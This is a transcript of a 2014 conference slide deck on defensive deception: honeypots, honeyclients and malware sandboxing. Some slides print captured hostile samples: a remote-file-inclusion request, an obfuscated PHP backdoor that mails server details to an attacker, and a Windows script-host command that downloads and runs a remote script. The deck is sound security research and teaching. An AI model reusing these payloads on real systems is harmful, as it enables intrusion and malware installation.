Deception, Honeypots and Honeyclients

Transcript

1. [proactive security] [deception, honeypots and honeyclients] Johnny Vestergaard [email protected] PROSA,

   May 2014

2. [agenda] • Introduction • The problem? • The opponent. •

   Honeypots. • Honeyclients. • Sandboxing.

3. [the speaker] ! • Software engineer • Former military intelligence

   analyst within Electronic Warfare • The Honeynet Project. • linkedin.com/in/johnnykv • github.com/johnnykv

4. [disclaimer] The views and opinions expressed in this presentation are

   the personal views of the speaker and do not necessarily reflect the views, policies or procedures of present or past employers. ! All information, tactics, techniques and procedures used or mentioned during this presentation are based solely on open and public accessible sources.

5. [the honeynet project] The Honeynet Project is a leading international

   501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security.

6. [analyst mindset] • respect your opponent. • feelings makes a

   bad analyst. • ... ”to know your enemy you must become your enemy”.

7. [the problem]

8. [blue team] • limited funds. • static infrastructure. • wide

   attack surface. • limited knowledge about the opponent.

9. [red team] • picks time and place. • knows the

   target. • not limited by the law. • low grade tools available online.

10. [the numbers] • In 80% of all data breaches it

    took attackers less than 24 hours to compromise. • In 75% of all data breaches it took longer than 24 hours for the blue team to detect the attack. Source: Verizon 2014 Data Breach Investigations Report (DBIR)

11. [the numbers] • 80% of all detections was done by

    external parties. Source: Verizon 2014 Data Breach Investigations Report (DBIR)

12. [the opponent]

13. [redacted] 6 slides with opponent analysis has been redacted.

14. [OODA] Observe Orient Decide Act

15. [OODA] Observe Orient Decide Act

16. [OODA] Observe Orient Decide Act Banner grabbing Study result -

    COA Choose COA Exploitation

17. [OODA] Observe Orient Decide Act Banner grabbing Study result -

    COA Choose COA Exploitation Firewalls / IDS

18. [active security] Defenders dilemma

19. [active security] Defenders dilemma vs. Intruders dilemma

20. [honeypots]

21. [the art of deception] Thus the expert in battle moves

    the enemy, and is not moved by him. Sun Tzu, old guy

22. [definition] A honeypot is an information system resource whose value

    lies in unauthorized or illicit use of that resource. Lance Spitzner

23. [honeypot?] O Observe Orient Decide Act

24. Observe Orient Decide Act [honeypot?] SSH VPN

25. [ENISA taxonomy] somewhat similar to our distinction between high- and

    low-interaction ones. 3.4 Our taxonomy For the purposes of this document, we expand the basic taxonomy described in section 3.2. Definitions of criteria (classes) and their particular values are still valid, but we will add an extra class and values in order to improve the research and presentation of its results. Figure 2: Graphical representation of the classification scheme of taxonomy used in the report Source: Proactive Detection of Security Incidents (ENISA 2012)

26. [deployment motivation] Production vs Research

27. [production deployment] SSH S7Comm

28. [deployment] In-between vs Shadownet

29. [in between deployment] SMB SSH ICS

30. [shadownet]

31. [interaction] High vs Low

32. [advantages] • Early detection. • Taking control. • OODA, possibility

    for you to Observe! • Know your enemy… • Unaffected by encryption. • Low rate of false positives.

33. [disadvantages] ! • Only useful if the opponent actually observes

    the honeypot. • Honeypot amplification. • The law.

34. [kippo] • Secure Shell (SSH). • Low interaction. • Easily

    deployable. • Developed by Upi Tamminen. • https://code.google.com/p/kippo/

35. [kippo demo]

36. [kippo analysis] • Analysis by Jose Nazario • http://monkey.org/~jose/ honeynet/kippo/

    • Analysis by Andrea De Pasquale • http://bl.ocks.org/adepasquale/ raw/6571226/

37. [kippo command analysis]

38. [glastopf] • Web app honeypot. • Emulation of SQLi, LFI,

    RFI, etc. • Give the adversary what he wants. • Targets tools, not humans. • Dork bootstraping of virgin instances. • Lead developer: Lukas Rist. • https://github.com/glastopf/glastopf

39. [glastopf demo]

40. [glastopf] • RFI log from normal webserver • GET /info.php?file=http://212.11.22.11/

    evil.txt • Attribution? • Let’s apply OODA.

41. [glastopf extraction]
    MD5: 6756481b836d968f6ca9291cc5f7ce68 z[~ƽ\sqGIF89a???????????!??????,???????D?;?<?php @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol'];

    $osc = $_GET['osc']; if (isset($lol)) { eval(gzinflate(base64_decode('tZFPS8MwGMbvg32HLAyawiwqnqxKj x68iFchdNmbNdomJW+KHbLvbtI/1uLAXbwkJM/z/ p4nBERhCH3MxbvS +4uX56e7rX2g6XIBnYAHvKVJXdS80XkFLE7oaJCNFk4ZTaBlayEhJp/ LBSFrC0juSRSl4aQkYSuoanfoPYMpCGwEcGgVOmQRtCCiyUJIFm66 wU3AxukoDCFvRmlGXzWdycd +gxLhVAoWUJb8V9aAzCa5b3wm9IAOqnl5s +XocuvY1DvrfTPyFO0H9uC4MNqB9tQfc14CveOihFyzMzvVOaIrbPN 3q9H5L70yhdyDTGMFsLUMwNrUoPt/pZbGJ76B0u +Mj0KVwFaZBCP9fDD3rsSTpIV85283V5fXN3E6Roc3

42. [glastopf extraction]
    MD5: 6756481b836d968f6ca9291cc5f7ce68 ?><? $time_shell = "".date("d/m/Y - H:i:s")."";

    $ip_remote = $_SERVER["REMOTE_ADDR"]; $from_shellcode ='.gethostbyname($_SERVER['SERVER_NAME']).'; $to_email = '[email protected]'; $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ". $_SERVER['HTTP_HOST'].""; $linkcr = "Backdoor PHP Injection : ".$_SERVER['SERVER_NAME']."". $_SERVER['REQUEST_URI']." - IP Pengguna : $ip_remote - Time: $time_shell"; $header = "From: $from_shellcode\r\nReply-to: $from_shellcode"; @mail($to_email, $server_mail, $linkcr, $header); ?><?

43. [ICS & Smartgrid]

44. [conpot] • ICS/PLC/Scada honeypot. • Modbus, HTTP, SNMP, S7Comm •

    Everything industrial • Exports to STIX/TAXII • Lead developer: Lukas Rist.

45. [conpot demo] DHCP SSH ICS SMTP

46. [nova] • Easy configuration and deployment • Based on Honeyd.

    • Included in ADHD. • Active Defence Harbinger Distribution • Comes also as hardware appliance. • Very low interaction.

47. [nova]

48. None

49. [beeswarm] [most honeypots are passive] SMB SSH ICS

50. [beeswarm] • Make honeypot technology easily available. • Active honeypots

    with bait traffic. • GSoC 2013, Aniket Panse. • https://github.com/honeynet/beeswarm • Version 1.0 July 2014… Hopefully… • Lead developer: Johnny Vestergaard.

51. [beeswarm setup] [one central application] Web app

52. [beeswarm setup] [generates honeypots] Honeypot Web app Honeypot Honeypot

53. [beeswarm setup] [generates bait traffic using clients] Honeypot Web app

    Honeypot Client Client Honeypot

54. [beeswarm setup] [generates bait traffic using clients] Honeypot Web app

    Honeypot Client Client Honeypot

55. [beeswarm demo]

56. [honeyclients]

57. [introduction] • Client side honeypots. • Emulates client software. •

    Secure download of malware.

58. [thug] • Browser emulation • Just as the attacker expects

    it (!). • Lead developer: Angelo Dell’Aera. • http://buffer.github.io/thug/doc/index.html

59. [thug] ~/thug/src $ python thug.py "http://[omitted]/main.php?page=8c6c59becaa0da07"! <snip>! * Saving applet

    Ryp.jar! * ActiveXObject: msxml2.xmlhttp! * ActiveXObject: acropdf.pdf! <snip>! * [Windows Script Host Run - Stage 1] Code:! cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://[omitted]/data/hcp_vbs.php? f=b081d&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe! * [Windows Script Host Run - Stage 1] Downloading from URL http://[omitted]/data/hcp_vbs.php?f=b081d&d=0! * [HTTP] URL: http://[omitted]/data/hcp_vbs.php?f=b081d&d=0 (Status: 200, Referrer: http://[omitted]/main.php? page=8c6c59becaa0da07)! * [Windows Script Host Run - Stage 2] Downloading from URL http://[omitted]/w.php?e=5&f=b081d! * [HTTP] URL: http://[omitted]/w.php?e=5&f=b081d! * [Windows Script Host Run - Stage 2] Saving file d328b5a123bce1c0d20d763ad745303a! <snip>! * [Navigator URL Translation] data/field.swf --> http://[omitted]/data/field.swf! * [HTTP] URL: http://[omitted]/data/field.swf! <snip>! * Saving remote content at data/field.swf (MD5: 502da89357ca5d7c85dc7a67f8977b21)! * Saving log analysis at ../logs/baa880d8d79c3488f2c0557be24cca6b/20120702191511!

60. [sandboxing]

61. [cuckoo sandbox] • Execution of files in a protected environment.

    • Forensic dump. • API calls, files, memory, pcap, etc. • http://www.cuckoosandbox.org/ • https://malwr.com/analysis/ NmY4MmY2MTAzMzlhNGJhZmFhMDEzNG ZlYTk4YWFkZmI/

62. [cuckoo sandbox]

63. [more information] ! • ENISA honeypot study. • The Honeynet

    Project. • 2014 Workshop: Warszawa. • Books and spooky army manuals • [email protected]